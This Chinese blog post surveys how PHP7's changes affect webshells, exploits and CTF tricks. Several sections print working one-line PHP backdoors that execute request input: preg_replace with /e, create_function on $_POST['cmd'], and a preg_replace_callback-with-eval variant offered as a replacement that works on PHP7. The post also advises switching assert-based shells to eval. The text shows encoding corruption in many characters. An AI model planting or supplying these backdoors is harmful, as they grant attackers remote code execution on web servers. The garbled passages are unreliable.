前言

之前測(cè)試的時(shí)候發(fā)現(xiàn)很多菜刀的馬都不能用了，大馬也幾乎3/4不能正常在php7運(yùn)行。網(wǎng)上百度也沒有找到太多相關(guān)性的文章，就自己總結(jié)測(cè)試了一下關(guān)于安全性上的區(qū)別。

函數(shù)修改

1. preg_replace()不再支持/e修飾符

 
 
 
 

  
  
  
  

  
  
  
  
preg_replace("/.*/e",$_GET["h"],".");  
  
  
  
  
?> 
 
 
 
 

利用\e修飾符執(zhí)行代碼的后門大家也用了不少了，具體看官方的這段描述:

很不幸，在PHP7以上版本不在支持\e修飾符，同時(shí)官方給了我們一個(gè)新的函數(shù)preg_replace_callback：

這里我們稍微改動(dòng)一下就可以利用它當(dāng)我們的后門：

 
 
 
 

  
  
  
  

  
  
  
  
preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); 
  
  
  
  
?> 
 
 
 
 

2. create_function()被廢棄

 
 
 
 

  
  
  
  

  
  
  
  
$func =create_function('',$_POST['cmd']);$func(); 
  
  
  
  
?> 
 
 
 
 

少了一種可以利用當(dāng)后門的函數(shù)，實(shí)際上它是通過執(zhí)行eval實(shí)現(xiàn)的?？捎锌蔁o。

3. mysql_*系列全員移除

如果你要在PHP7上面用老版本的mysql_*系列函數(shù)需要你自己去額外裝了，官方不在自帶，現(xiàn)在官方推薦的是mysqli或者pdo_mysql。這是否預(yù)示著未來SQL注入漏洞在PHP上的大幅減少呢~

4. unserialize()增加一個(gè)可選白名單參數(shù)

 
 
 
 

  
  
  
  
$data = unserialize($serializedObj1 , ["allowed_classes" => true]); 
  
  
  
  
$data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);  
 
 
 
 

其實(shí)就是一個(gè)白名單，如果反序列數(shù)據(jù)里面的類名不在這個(gè)白名單內(nèi)，就會(huì)報(bào)錯(cuò)。

像這樣的報(bào)錯(cuò)!

可以是類名也可以是布爾數(shù)據(jù)，如果是FALSE就會(huì)將所有的對(duì)象都轉(zhuǎn)換為__PHP_Incomplete_Class對(duì)象。TRUE是沒有限制的。也可以傳入類名實(shí)現(xiàn)白名單。

還好現(xiàn)在是可選不是必選，要是默認(rèn)FALSE逼程序員弄白名單那就真的吐血了。

5. assert()默認(rèn)不在可以執(zhí)行代碼

這就是眾多馬不能用的罪魁禍?zhǔn)琢?，太多的馬用assert()來執(zhí)行代碼了，這個(gè)更新基本就團(tuán)滅，一般情況下修改成eval即可正常運(yùn)行了~

提一下，菜刀在實(shí)現(xiàn)文件管理器的時(shí)候用的恰好也是assert函數(shù)，這導(dǎo)致菜刀沒辦法在PHP7上正常運(yùn)行。

語法修改

1. foreach不再改變內(nèi)部數(shù)組指針

 
 
 
 

  
  
  
  

  
  
  
  
$a = array('1','2','3'); 
  
  
  
  
foreach ($a as $k=>&$n){ 
  
  
  
  
    echo ""; 
  
  
  
  
} 
  
  
  
  
print_r($a); 
  
  
  
  
foreach ($a as $k=>$n){ 
  
  
  
  
    echo ""; 
  
  
  
  
 
  
  
  
  
} 
  
  
  
  
print_r($a); 
 
 
 
 

這樣的代碼在php5中，是這樣的執(zhí)行結(jié)果：

因?yàn)閿?shù)組最后一個(gè)元素的 $value 引用在 foreach 循環(huán)之后仍會(huì)保留，在第二個(gè)循環(huán)的時(shí)候?qū)嶋H上是對(duì)之前的指針不斷的賦值。php7中通過值遍歷時(shí)，操作的值為數(shù)組的副本，不在對(duì)后續(xù)操作進(jìn)行影響。

這個(gè)改動(dòng)影響了某些cms的洞在PHP7上無法利用了….你知道我指的是哪個(gè)洞的。

這個(gè)問題在PHP7.0.0以后的版本又被改回去了，只影響這一個(gè)版本。

2. 8進(jìn)制字符容錯(cuò)率降低

在php5版本，如果一個(gè)八進(jìn)制字符如果含有無效數(shù)字，該無效數(shù)字將被靜默刪節(jié)。

 
 
 
 

  
  
  
  

  
  
  
  
echo octdec( '012999999999999' ) . "\n"; 
  
  
  
  
echo octdec( '012' ) . "\n"; 
  
  
  
  
if (octdec( '012999999999999' )==octdec( '012' )){ 
  
  
  
  
        echo ": )". "\n"; 
  
  
  
  
} 
 
 
 
 

比如這樣的代碼在php5中的執(zhí)行結(jié)果如下：

但是在php7里面會(huì)觸發(fā)一個(gè)解析錯(cuò)誤。

這個(gè)問題同樣在PHP7.0.0以后的版本又被改回去了，只影響這一個(gè)版本。

3. 十六進(jìn)制字符串不再被認(rèn)為是數(shù)字

這個(gè)修改一出，以后CTF套路會(huì)少很多啊~

很多騷操作都不能用了~

這個(gè)沒什么好說的，大家都懂。

 
 
 
 

  
  
  
  

  
  
  
  
var_dump("0x123" == "291"); 
  
  
  
  
var_dump(is_numeric("0x123")); 
  
  
  
  
var_dump("0xe" + "0x1"); 
  
  
  
  
var_dump(substr("foo", "0x1")); 
  
  
  
  
?> 
 
 
 
 

以上代碼在PHP5運(yùn)行結(jié)果如下：

PHP7運(yùn)行結(jié)果如下：

你以為我要說這個(gè)在后續(xù)版本被改回去了?不，目前截至PHP7.3版本依然沒有改回去的征兆，官方稱不會(huì)在改了。這個(gè)講道理還是蠻傷的。

4. 移除了 ASP 和 script PHP 標(biāo)簽

現(xiàn)在只有 這樣的標(biāo)簽?zāi)茉趐hp7上運(yùn)行了。

字面意思，影響其實(shí)不是很大(只是以后騷套路會(huì)少一點(diǎn))。

5. 超大浮點(diǎn)數(shù)類型轉(zhuǎn)換截?cái)?/strong>

將浮點(diǎn)數(shù)轉(zhuǎn)換為整數(shù)的時(shí)候，如果浮點(diǎn)數(shù)值太大，導(dǎo)致無法以整數(shù)表達(dá)的情況下， 在PHP5的版本中，轉(zhuǎn)換會(huì)直接將整數(shù)截?cái)?，并不?huì)引發(fā)錯(cuò)誤。 在PHP7中，會(huì)報(bào)錯(cuò)。

CTF又少一個(gè)出題套路，這個(gè)問題我只在CTF上見過，影響應(yīng)該不大。

雜項(xiàng)

• exec(), system() passthru()函數(shù)對(duì) NULL 增加了保護(hù).
• list()不再能解開字符串string變量
• $HTTP_RAW_POST_DATA 被移除
• __autoload() 方法被廢棄
• parse_str() 不加第二個(gè)參數(shù)會(huì)直接把字符串導(dǎo)入當(dāng)前的符號(hào)表，如果加了就會(huì)轉(zhuǎn)換稱一個(gè)數(shù)組?，F(xiàn)在是第二個(gè)參數(shù)是強(qiáng)行選項(xiàng)了。
• 統(tǒng)一不同平臺(tái)下的整型長度
• session_start() 可以加入一個(gè)數(shù)組覆蓋php.ini的配置